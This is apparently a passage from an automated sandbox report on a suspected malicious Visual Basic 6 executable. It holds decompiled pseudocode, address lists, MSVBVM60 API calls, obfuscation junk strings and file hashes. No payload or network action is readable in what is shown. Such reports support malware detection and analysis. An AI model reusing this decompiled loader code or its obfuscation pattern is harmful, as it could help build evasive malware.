				signed int _t628;
				char* _t632;
				signed int _t636;
				char* _t650;
				void* _t651;
				signed int* _t685;
				char* _t708;
				void* _t709;
				void* _t716;
				intOrPtr _t723;
				void* _t725;
				void* _t726;
				void* _t727;
				intOrPtr* _t729;

				 *[fs:0x0] = _t723;
				L004011D0();
				_v16 = _t723;
				_v12 = 0x401140;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, _t709, _t716, _t651,  *[fs:0x0], 0x4011d6);
				if( *0x414010 != 0) {
					_v276 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v276 = 0x414010;
				}
				_t461 =  &_v80;
				L00401332();
				_v216 = _t461;
				_t465 =  *((intOrPtr*)( *_v216 + 0x70))(_v216,  &_v68, _t461,  *((intOrPtr*)( *((intOrPtr*)( *_v276)) + 0x304))( *_v276));
				asm("fclex");
				_v220 = _t465;
				if(_v220 >= 0) {
					_v280 = _v280 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40273c);
					_push(_v216);
					_push(_v220);
					L00401326();
					_v280 = _t465;
				}
				_v260 = _v68;
				_v68 = _v68 & 0x00000000;
				_v100 = _v260;
				_v108 = 8;
				_push(0);
				_push( &_v108); // executed
				L00401338(); // executed
				L0040133E();
				L00401320();
				L0040131A();
				if( *0x414010 != 0) {
					_v284 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v284 = 0x414010;
				}
				_t472 =  &_v80;
				L00401332();
				_v216 = _t472;
				_t476 =  *((intOrPtr*)( *_v216 + 0x150))(_v216,  &_v68, _t472,  *((intOrPtr*)( *((intOrPtr*)( *_v284)) + 0x2fc))( *_v284));
				asm("fclex");
				_v220 = _t476;
				if(_v220 >= 0) {
					_v288 = _v288 & 0x00000000;
				} else {
					_push(0x150);
					_push(0x40274c);
					_push(_v216);
					_push(_v220);
					L00401326();
					_v288 = _t476;
				}
				if( *0x414010 != 0) {
					_v292 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v292 = 0x414010;
				}
				_t480 =  &_v84;
				L00401332();
				_v224 = _t480;
				_t484 =  *((intOrPtr*)( *_v224 + 0x48))(_v224,  &_v72, _t480,  *((intOrPtr*)( *((intOrPtr*)( *_v292)) + 0x300))( *_v292));
				asm("fclex");
				_v228 = _t484;
				if(_v228 >= 0) {
					_v296 = _v296 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40274c);
					_push(_v224);
					_push(_v228);
					L00401326();
					_v296 = _t484;
				}
				_v148 = L"Komparenten7";
				_v156 = 8;
				_v264 = _v72;
				_v72 = _v72 & 0x00000000;
				L0040133E();
				_v100 = 0x39d6fa;
				_v108 = 3;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t491 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, _v68,  &_v108, 0x1c137100, 0x5afa,  &_v76, 0x10, 0x7922bc);
				_v232 = _t491;
				if(_v232 >= 0) {
					_v300 = _v300 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x402490);
					_push(_a4);
					_push(_v232);
					L00401326();
					_v300 = _t491;
				}
				_push( &_v76);
				_push( &_v68);
				_push(2);
				L00401314();
				_push( &_v84);
				_push( &_v80);
				_push(2);
				L0040130E();
				_t725 = _t723 + 0x18;
				L0040131A();
				if( *0x414010 != 0) {
					_v304 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v304 = 0x414010;
				}
				_t499 =  &_v80;
				L00401332();
				_v216 = _t499;
				_t503 =  *((intOrPtr*)( *_v216 + 0x1c0))(_v216,  &_v160, _t499,  *((intOrPtr*)( *((intOrPtr*)( *_v304)) + 0x300))( *_v304));
				asm("fclex");
				_v220 = _t503;
				if(_v220 >= 0) {
					_v308 = _v308 & 0x00000000;
				} else {
					_push(0x1c0);
					_push(0x40274c);
					_push(_v216);
					_push(_v220);
					L00401326();
					_v308 = _t503;
				}
				if( *0x414010 != 0) {
					_v312 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v312 = 0x414010;
				}
				_t507 =  &_v84;
				L00401332();
				_v224 = _t507;
				_t511 =  *((intOrPtr*)( *_v224 + 0x78))(_v224,  &_v164, _t507,  *((intOrPtr*)( *((intOrPtr*)( *_v312)) + 0x2fc))( *_v312));
				asm("fclex");
				_v228 = _t511;
				if(_v228 >= 0) {
					_v316 = _v316 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x40274c);
					_push(_v224);
					_push(_v228);
					L00401326();
					_v316 = _t511;
				}
				_v168 = _v164;
				_v132 = _v160;
				_v140 = 3;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t518 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, 0x10,  &_v168,  &_v172);
				_v232 = _t518;
				if(_v232 >= 0) {
					_v320 = _v320 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x402490);
					_push(_a4);
					_push(_v232);
					L00401326();
					_v320 = _t518;
				}
				_v32 = _v172;
				_push( &_v84);
				_push( &_v80);
				_push(2);
				L0040130E();
				_t726 = _t725 + 0xc;
				if( *0x414010 != 0) {
					_v324 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v324 = 0x414010;
				}
				_t524 =  &_v80;
				L00401332();
				_v216 = _t524;
				_t528 =  *((intOrPtr*)( *_v216 + 0x170))(_v216,  &_v160, _t524,  *((intOrPtr*)( *((intOrPtr*)( *_v324)) + 0x300))( *_v324));
				asm("fclex");
				_v220 = _t528;
				if(_v220 >= 0) {
					_v328 = _v328 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40274c);
					_push(_v216);
					_push(_v220);
					L00401326();
					_v328 = _t528;
				}
				if( *0x414010 != 0) {
					_v332 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v332 = 0x414010;
				}
				_t532 =  &_v84;
				L00401332();
				_v224 = _t532;
				_t536 =  *((intOrPtr*)( *_v224 + 0x60))(_v224,  &_v164, _t532,  *((intOrPtr*)( *((intOrPtr*)( *_v332)) + 0x304))( *_v332));
				asm("fclex");
				_v228 = _t536;
				if(_v228 >= 0) {
					_v336 = _v336 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40273c);
					_push(_v224);
					_push(_v228);
					L00401326();
					_v336 = _t536;
				}
				if( *0x414010 != 0) {
					_v340 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v340 = 0x414010;
				}
				_t540 =  &_v88;
				L00401332();
				_v232 = _t540;
				_t544 =  *((intOrPtr*)( *_v232 + 0x80))(_v232,  &_v168, _t540,  *((intOrPtr*)( *((intOrPtr*)( *_v340)) + 0x300))( *_v340));
				asm("fclex");
				_v236 = _t544;
				if(_v236 >= 0) {
					_v344 = _v344 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x40274c);
					_push(_v232);
					_push(_v236);
					L00401326();
					_v344 = _t544;
				}
				if( *0x414010 != 0) {
					_v348 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v348 = 0x414010;
				}
				_t548 =  &_v92;
				L00401332();
				_v240 = _t548;
				_t552 =  *((intOrPtr*)( *_v240 + 0x78))(_v240,  &_v172, _t548,  *((intOrPtr*)( *((intOrPtr*)( *_v348)) + 0x300))( *_v348));
				asm("fclex");
				_v244 = _t552;
				if(_v244 >= 0) {
					_v352 = _v352 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x40274c);
					_push(_v240);
					_push(_v244);
					L00401326();
					_v352 = _t552;
				}
				_t685 =  &_v68;
				L00401308();
				_v184 = _v172;
				_v180 = 0x81ccb9;
				_v196 =  *0x401138;
				_v100 = _v164;
				_v108 = 3;
				_v132 = L"Diarch4";
				_v140 = 8;
				_v176 = _v160;
				_v280 =  *0x401130;
				_v288 = _v168;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t565 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v176, 0x10,  &_v108,  &_v196,  &_v180, _t685,  &_v184, _t685,  &_v68,  &_v188);
				_v248 = _t565;
				if(_v248 >= 0) {
					_v356 = _v356 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x402490);
					_push(_a4);
					_push(_v248);
					L00401326();
					_v356 = _t565;
				}
				_v36 = _v188;
				L00401302();
				_push( &_v92);
				_push( &_v88);
				_push( &_v84);
				_push( &_v80);
				_push(4);
				L0040130E();
				_t727 = _t726 + 0x14;
				L0040131A();
				if( *0x414010 != 0) {
					_v360 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v360 = 0x414010;
				}
				_t574 =  &_v80;
				L00401332();
				_v216 = _t574;
				_t578 =  *((intOrPtr*)( *_v216 + 0x60))(_v216,  &_v160, _t574,  *((intOrPtr*)( *((intOrPtr*)( *_v360)) + 0x30c))( *_v360));
				asm("fclex");
				_v220 = _t578;
				if(_v220 >= 0) {
					_v364 = _v364 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40273c);
					_push(_v216);
					_push(_v220);
					L00401326();
					_v364 = _t578;
				}
				if( *0x414010 != 0) {
					_v368 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v368 = 0x414010;
				}
				_t582 =  &_v84;
				L00401332();
				_v224 = _t582;
				_t586 =  *((intOrPtr*)( *_v224 + 0x1c0))(_v224,  &_v164, _t582,  *((intOrPtr*)( *((intOrPtr*)( *_v368)) + 0x300))( *_v368));
				asm("fclex");
				_v228 = _t586;
				if(_v228 >= 0) {
					_v372 = _v372 & 0x00000000;
				} else {
					_push(0x1c0);
					_push(0x40274c);
					_push(_v224);
					_push(_v228);
					L00401326();
					_v372 = _t586;
				}
				if( *0x414010 != 0) {
					_v376 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v376 = 0x414010;
				}
				_t590 =  &_v88;
				L00401332();
				_v232 = _t590;
				_t594 =  *((intOrPtr*)( *_v232 + 0xa0))(_v232,  &_v68, _t590,  *((intOrPtr*)( *((intOrPtr*)( *_v376)) + 0x300))( *_v376));
				asm("fclex");
				_v236 = _t594;
				if(_v236 >= 0) {
					_v380 = _v380 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x40274c);
					_push(_v232);
					_push(_v236);
					L00401326();
					_v380 = _t594;
				}
				_v116 = 0x6451d2;
				_v124 = 3;
				_v268 = _v68;
				_v68 = _v68 & 0x00000000;
				_v100 = _v268;
				_v108 = 8;
				_v204 = 0xfb4cd7f0;
				_v200 = 0x5af3;
				_v168 = _v160;
				_v132 = 0x4b712a;
				_v140 = 3;
				_v196 =  *0x401128;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t607 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v196, L"Holocentridae2", 0x10, 0x5ac5,  &_v168, _v164,  &_v204, 0x10,  &_v124,  &_v212);
				_v240 = _t607;
				if(_v240 >= 0) {
					_v384 = _v384 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x402490);
					_push(_a4);
					_push(_v240);
					L00401326();
					_v384 = _t607;
				}
				_v44 = _v212;
				_v40 = _v208;
				L0040130E();
				L004012FC();
				_t729 = _t727 + 0x1c;
				_t617 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v108,  &_v124, 3,  &_v80,  &_v84,  &_v88);
				asm("fclex");
				_v216 = _t617;
				if(_v216 >= 0) {
					_v388 = _v388 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x402460);
					_push(_a4);
					_push(_v216);
					L00401326();
					_v388 = _t617;
				}
				while(1) {
					 *((intOrPtr*)( *_a4 + 0x70c))(_a4);
					if( *0x414010 != 0) {
						_v392 = 0x414010;
					} else {
						_push(0x414010);
						_push(0x402bc0);
						L0040132C();
						_v392 = 0x414010;
					}
					_t624 =  &_v80;
					L00401332();
					_v216 = _t624;
					_t628 =  *((intOrPtr*)( *_v216 + 0x60))(_v216,  &_v160, _t624,  *((intOrPtr*)( *((intOrPtr*)( *_v392)) + 0x2fc))( *_v392));
					asm("fclex");
					_v220 = _t628;
					if(_v220 >= 0) {
						_v396 = _v396 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40274c);
						_push(_v216);
						_push(_v220);
						L00401326();
						_v396 = _t628;
					}
					if( *0x414010 != 0) {
						_v400 = 0x414010;
					} else {
						_push(0x414010);
						_push(0x402bc0);
						L0040132C();
						_v400 = 0x414010;
					}
					_t632 =  &_v84;
					L00401332();
					_v224 = _t632;
					_t636 =  *((intOrPtr*)( *_v224 + 0xa0))(_v224,  &_v68, _t632,  *((intOrPtr*)( *((intOrPtr*)( *_v400)) + 0x2fc))( *_v400));
					asm("fclex");
					_v228 = _t636;
					if(_v228 >= 0) {
						_v404 = _v404 & 0x00000000;
					} else {
						_push(0xa0);
						_push(0x40274c);
						_push(_v224);
						_push(_v228);
						L00401326();
						_v404 = _t636;
					}
					_v196 =  *0x401120;
					_t708 = L"Seksualklinikken9";
					L00401308();
					_v272 = _v68;
					_v68 = _v68 & 0x00000000;
					_v116 = _v272;
					_v124 = 8;
					_v100 = _v160;
					_v108 = 3;
					L004011D0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *_t729 =  *0x401118;
					 *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v72,  &_v108, 0x10,  &_v72,  &_v196);
					L00401302();
					_push( &_v84);
					_push( &_v80);
					_push(2);
					L0040130E();
					_push( &_v124);
					_t650 =  &_v108;
					_push(_t650);
					_push(2);
					L004012FC();
					_t729 = _t729 + 0x18;
					_push(1);
					L004012F0();
					_push(_t708);
					_push(_t650);
					_push(_v40);
					_push(_v44);
					L004012F6();
					_v44 = _t650;
					_v40 = _t708;
					_push(_v40);
					_push(_v44);
					L004012EA();
					if(_t650 >= 0) {
						break;
					}
				}
				goto __ebx;
			}

0x00410f46
0x00410f52
0x00410f5a
0x00410f5d
0x00410f6a
0x00410f73
0x00410f7e
0x00410f88
0x00410fa5
0x00410f8a
0x00410f8a
0x00410f8f
0x00410f94
0x00410f99
0x00410f99
0x00410fc9
0x00410fcd
0x00410fd2
0x00410fea
0x00410fed
0x00410fef
0x00410ffc
0x0041101e
0x00410ffe
0x00410ffe
0x00411000
0x00411005
0x0041100b
0x00411011
0x00411016
0x00411016
0x00411028
0x0041102e
0x00411038
0x0041103b
0x00411042
0x00411047
0x00411048
0x00411052
0x0041105a
0x00411062
0x0041106e
0x0041108b
0x00411070
0x00411070
0x00411075
0x0041107a
0x0041107f
0x0041107f
0x004110af
0x004110b3
0x004110b8
0x004110d0
0x004110d6
0x004110d8
0x004110e5
0x0041110a
0x004110e7
0x004110e7
0x004110ec
0x004110f1
0x004110f7
0x004110fd
0x00411102
0x00411102
0x00411118
0x00411135
0x0041111a
0x0041111a
0x0041111f
0x00411124
0x00411129
0x00411129
0x00411159
0x0041115d
0x00411162
0x0041117a
0x0041117d
0x0041117f
0x0041118c
0x004111ae
0x0041118e
0x0041118e
0x00411190
0x00411195
0x0041119b
0x004111a1
0x004111a6
0x004111a6
0x004111b5
0x004111bf
0x004111cc
0x004111d2
0x004111df
0x004111e4
0x004111eb
0x004111fa
0x00411207
0x00411208
0x00411209
0x0041120a
0x00411228
0x0041122e
0x0041123b
0x0041125d
0x0041123d
0x0041123d
0x00411242
0x00411247
0x0041124a
0x00411250
0x00411255
0x00411255
0x00411267
0x0041126b
0x0041126c
0x0041126e
0x00411279
0x0041127d
0x0041127e
0x00411280
0x00411285
0x0041128b
0x00411297
0x004112b4
0x00411299
0x00411299
0x0041129e
0x004112a3
0x004112a8
0x004112a8
0x004112d8
0x004112dc
0x004112e1
0x004112fc
0x00411302
0x00411304
0x00411311
0x00411336
0x00411313
0x00411313
0x00411318
0x0041131d
0x00411323
0x00411329
0x0041132e
0x0041132e
0x00411344
0x00411361
0x00411346
0x00411346
0x0041134b
0x00411350
0x00411355
0x00411355
0x00411385
0x00411389
0x0041138e
0x004113a9
0x004113ac
0x004113ae
0x004113bb
0x004113dd
0x004113bd
0x004113bd
0x004113bf
0x004113c4
0x004113ca
0x004113d0
0x004113d5
0x004113d5
0x004113ea
0x004113f6
0x004113f9
0x00411414
0x00411421
0x00411422
0x00411423
0x00411424
0x0041142d
0x00411433
0x00411440
0x00411462
0x00411442
0x00411442
0x00411447
0x0041144c
0x0041144f
0x00411455
0x0041145a
0x0041145a
0x0041146f
0x00411475
0x00411479
0x0041147a
0x0041147c
0x00411481
0x0041148b
0x004114a8
0x0041148d
0x0041148d
0x00411492
0x00411497
0x0041149c
0x0041149c
0x004114cc
0x004114d0
0x004114d5
0x004114f0
0x004114f6
0x004114f8
0x00411505
0x0041152a
0x00411507
0x00411507
0x0041150c
0x00411511
0x00411517
0x0041151d
0x00411522
0x00411522
0x00411538
0x00411555
0x0041153a
0x0041153a
0x0041153f
0x00411544
0x00411549
0x00411549
0x00411579
0x0041157d
0x00411582
0x0041159d
0x004115a0
0x004115a2
0x004115af
0x004115d1
0x004115b1
0x004115b1
0x004115b3
0x004115b8
0x004115be
0x004115c4
0x004115c9
0x004115c9
0x004115df
0x004115fc
0x004115e1
0x004115e1
0x004115e6
0x004115eb
0x004115f0
0x004115f0
0x00411620
0x00411624
0x00411629
0x00411644
0x0041164a
0x0041164c
0x00411659
0x0041167e
0x0041165b
0x0041165b
0x00411660
0x00411665
0x0041166b
0x00411671
0x00411676
0x00411676
0x0041168c
0x004116a9
0x0041168e
0x0041168e
0x00411693
0x00411698
0x0041169d
0x0041169d
0x004116cd
0x004116d1
0x004116d6
0x004116f1
0x004116f4
0x004116f6
0x00411703
0x00411725
0x00411705
0x00411705
0x00411707
0x0041170c
0x00411712
0x00411718
0x0041171d
0x0041171d
0x00411731
0x00411734
0x0041173f
0x00411745
0x00411755
0x00411761
0x00411764
0x0041176b
0x00411772
0x00411782
0x0041179a
0x004117ab
0x004117c3
0x004117d0
0x004117d1
0x004117d2
0x004117d3
0x004117e3
0x004117e9
0x004117f6
0x00411818
0x004117f8
0x004117f8
0x004117fd
0x00411802
0x00411805
0x0041180b
0x00411810
0x00411810
0x00411825
0x0041182b
0x00411833
0x00411837
0x0041183b
0x0041183f
0x00411840
0x00411842
0x00411847
0x0041184d
0x00411859
0x00411876
0x0041185b
0x0041185b
0x00411860
0x00411865
0x0041186a
0x0041186a
0x0041189a
0x0041189e
0x004118a3
0x004118be
0x004118c1
0x004118c3
0x004118d0
0x004118f2
0x004118d2
0x004118d2
0x004118d4
0x004118d9
0x004118df
0x004118e5
0x004118ea
0x004118ea
0x00411900
0x0041191d
0x00411902
0x00411902
0x00411907
0x0041190c
0x00411911
0x00411911
0x00411941
0x00411945
0x0041194a
0x00411965
0x0041196b
0x0041196d
0x0041197a
0x0041199f
0x0041197c
0x0041197c
0x00411981
0x00411986
0x0041198c
0x00411992
0x00411997
0x00411997
0x004119ad
0x004119ca
0x004119af
0x004119af
0x004119b4
0x004119b9
0x004119be
0x004119be
0x004119ee
0x004119f2
0x004119f7
0x00411a0f
0x00411a15
0x00411a17
0x00411a24
0x00411a49
0x00411a26
0x00411a26
0x00411a2b
0x00411a30
0x00411a36
0x00411a3c
0x00411a41
0x00411a41
0x00411a50
0x00411a57
0x00411a61
0x00411a67
0x00411a71
0x00411a74
0x00411a7b
0x00411a85
0x00411a95
0x00411a9b
0x00411aa2
0x00411ab2
0x00411ac6
0x00411ad0
0x00411ad1
0x00411ad2
0x00411ad3
0x00411af0
0x00411afd
0x00411afe
0x00411aff
0x00411b00
0x00411b15
0x00411b1b
0x00411b28
0x00411b4a
0x00411b2a
0x00411b2a
0x00411b2f
0x00411b34
0x00411b37
0x00411b3d
0x00411b42
0x00411b42
0x00411b57
0x00411b60
0x00411b71
0x00411b83
0x00411b88
0x00411b93
0x00411b99
0x00411b9b
0x00411ba8
0x00411bca
0x00411baa
0x00411baa
0x00411baf
0x00411bb4
0x00411bb7
0x00411bbd
0x00411bc2
0x00411bc2
0x00411bd1
0x00411bd9
0x00411be6
0x00411c03
0x00411be8
0x00411be8
0x00411bed
0x00411bf2
0x00411bf7
0x00411bf7
0x00411c27
0x00411c2b
0x00411c30
0x00411c4b
0x00411c4e
0x00411c50
0x00411c5d
0x00411c7f
0x00411c5f
0x00411c5f
0x00411c61
0x00411c66
0x00411c6c
0x00411c72
0x00411c77
0x00411c77
0x00411c8d
0x00411caa
0x00411c8f
0x00411c8f
0x00411c94
0x00411c99
0x00411c9e
0x00411c9e
0x00411cce
0x00411cd2
0x00411cd7
0x00411cef
0x00411cf5
0x00411cf7
0x00411d04
0x00411d29
0x00411d06
0x00411d06
0x00411d0b
0x00411d10
0x00411d16
0x00411d1c
0x00411d21
0x00411d21
0x00411d36
0x00411d3c
0x00411d44
0x00411d4c
0x00411d52
0x00411d5c
0x00411d5f
0x00411d6c
0x00411d6f
0x00411d84
0x00411d8e
0x00411d8f
0x00411d90
0x00411d91
0x00411d9d
0x00411da8
0x00411db1
0x00411db9
0x00411dbd
0x00411dbe
0x00411dc0
0x00411dcb
0x00411dcc
0x00411dcf
0x00411dd0
0x00411dd2
0x00411dd7
0x00411dda
0x00411ddc
0x00411de1
0x00411de2
0x00411de3
0x00411de6
0x00411de9
0x00411dee
0x00411df1
0x00411df4
0x00411df7
0x00411e00
0x00411e07
0x00000000
0x00000000
0x00411e09
0x00411e13

APIs

__vbaChkstk.MSVBVM60(?,004011D6), ref: 00410F52
__vbaNew2.MSVBVM60(00402BC0,00414010,?,?,?,?,004011D6), ref: 00410F94
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410FCD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040273C,00000070), ref: 00411011
#645.MSVBVM60(00000008,00000000), ref: 00411048
__vbaStrMove.MSVBVM60(00000008,00000000), ref: 00411052
__vbaFreeObj.MSVBVM60(00000008,00000000), ref: 0041105A
__vbaFreeVar.MSVBVM60(00000008,00000000), ref: 00411062
__vbaNew2.MSVBVM60(00402BC0,00414010,00000008,00000000), ref: 0041107A
__vbaObjSet.MSVBVM60(?,00000000), ref: 004110B3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,00000150), ref: 004110FD
__vbaNew2.MSVBVM60(00402BC0,00414010), ref: 00411124
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041115D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,00000048), ref: 004111A1
__vbaStrMove.MSVBVM60(00000000,?,0040274C,00000048), ref: 004111DF
__vbaChkstk.MSVBVM60(007922BC), ref: 004111FA
__vbaHresultCheckObj.MSVBVM60(00000000,00401140,00402490,000006F8), ref: 00411250
__vbaFreeStrList.MSVBVM60(00000002,00000000,?), ref: 0041126E
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,004011D6), ref: 00411280
__vbaFreeVar.MSVBVM60(?,?,?,?,?,004011D6), ref: 0041128B
__vbaNew2.MSVBVM60(00402BC0,00414010,?,?,?,?,?,004011D6), ref: 004112A3
__vbaObjSet.MSVBVM60(?,00000000), ref: 004112DC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,000001C0), ref: 00411329
__vbaNew2.MSVBVM60(00402BC0,00414010), ref: 00411350
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411389
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,00000078), ref: 004113D0
__vbaChkstk.MSVBVM60(?,?), ref: 00411414
__vbaHresultCheckObj.MSVBVM60(00000000,00401140,00402490,000006FC), ref: 00411455
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041147C
__vbaNew2.MSVBVM60(00402BC0,00414010,?,?,?,?,?,?,?,?,004011D6), ref: 00411497
__vbaObjSet.MSVBVM60(?,00000000), ref: 004114D0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,00000170), ref: 0041151D
__vbaNew2.MSVBVM60(00402BC0,00414010), ref: 00411544
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041157D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040273C,00000060), ref: 004115C4
__vbaNew2.MSVBVM60(00402BC0,00414010), ref: 004115EB
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411624
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,00000080), ref: 00411671
__vbaNew2.MSVBVM60(00402BC0,00414010), ref: 00411698
__vbaObjSet.MSVBVM60(?,00000000), ref: 004116D1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,00000078), ref: 00411718
__vbaStrCopy.MSVBVM60(00000000,?,0040274C,00000078), ref: 00411734
__vbaChkstk.MSVBVM60(00000003,?,0081CCB9,?,?,?,?,?), ref: 004117C3
__vbaHresultCheckObj.MSVBVM60(00000000,00401140,00402490,00000700,?,?,?,?,?), ref: 0041180B
__vbaFreeStr.MSVBVM60(?,?,?,?,?), ref: 0041182B
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?), ref: 00411842
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004011D6), ref: 0041184D
__vbaNew2.MSVBVM60(00402BC0,00414010,?,?,?,?,?,?,?,?,?,?,?,?,?,004011D6), ref: 00411865
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041189E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040273C,00000060), ref: 004118E5
__vbaNew2.MSVBVM60(00402BC0,00414010), ref: 0041190C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411945
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,000001C0), ref: 00411992
__vbaNew2.MSVBVM60(00402BC0,00414010), ref: 004119B9
__vbaObjSet.MSVBVM60(?,00000000), ref: 004119F2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,000000A0), ref: 00411A3C
__vbaChkstk.MSVBVM60(00000003,?), ref: 00411AC6
__vbaChkstk.MSVBVM60(00005AC5,?,?,FB4CD7F0,00000003,?), ref: 00411AF0
__vbaHresultCheckObj.MSVBVM60(00000000,00401140,00402490,00000704), ref: 00411B3D
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00411B71
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00411B83
__vbaHresultCheckObj.MSVBVM60(00000000,00401140,00402460,000002B4), ref: 00411BBD
__vbaNew2.MSVBVM60(00402BC0,00414010,?,00000001), ref: 00411BF2
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411C2B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,00000060), ref: 00411C72
__vbaNew2.MSVBVM60(00402BC0,00414010,00000000,?,0040274C,00000060), ref: 00411C99
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411CD2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,000000A0), ref: 00411D1C
__vbaStrCopy.MSVBVM60(00000000,?,0040274C,000000A0), ref: 00411D44
__vbaChkstk.MSVBVM60(?,?), ref: 00411D84
__vbaFreeStr.MSVBVM60(?,00000003,?,?), ref: 00411DB1
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,00000003,?,?), ref: 00411DC0
__vbaFreeVarList.MSVBVM60(00000002,00000003,?), ref: 00411DD2
__vbaCyI2.MSVBVM60(00000001), ref: 00411DDC
__vbaCyAdd.MSVBVM60(?,?,00000000,?,00000001), ref: 00411DE9
__vbaFpCmpCy.MSVBVM60(?,?,?,?,00000000,?,00000001), ref: 00411E00

Strings

centennial, xrefs: 0041172C
*qK, xrefs: 00411A9B
Holocentridae2, xrefs: 00411B01
Diarch4, xrefs: 0041176B
Seksualklinikken9, xrefs: 00411D3C
Komparenten7, xrefs: 004111B5

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$List$Chkstk$CopyMove$#645
String ID: *qK$Diarch4$Holocentridae2$Komparenten7$Seksualklinikken9$centennial
API String ID: 3649353455-958078613
Opcode ID: b224343d5b7a231deae24d0e7961525bf9cdb4b235405e213e150d496d30cba4
Instruction ID: a4fa3efb314607bf4530021e99bf32f4f6f397ca99e4822c51d9a46b7c15deee
Opcode Fuzzy Hash: b224343d5b7a231deae24d0e7961525bf9cdb4b235405e213e150d496d30cba4
Instruction Fuzzy Hash: B792E5B1900228DFDB21DF91CC49BDDBBB5BB08304F1044EAE609BB2A1D7795A85DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00412019, Relevance: 79.0, APIs: 37, Strings: 8, Instructions: 233
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00412019(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				void* _v48;
				void* _v64;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v84;
				char _v92;
				char _v108;
				signed int _v116;
				char _v124;
				char* _v132;
				intOrPtr _v140;
				void* _v160;
				signed int _v164;
				signed int _v168;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				intOrPtr _t91;
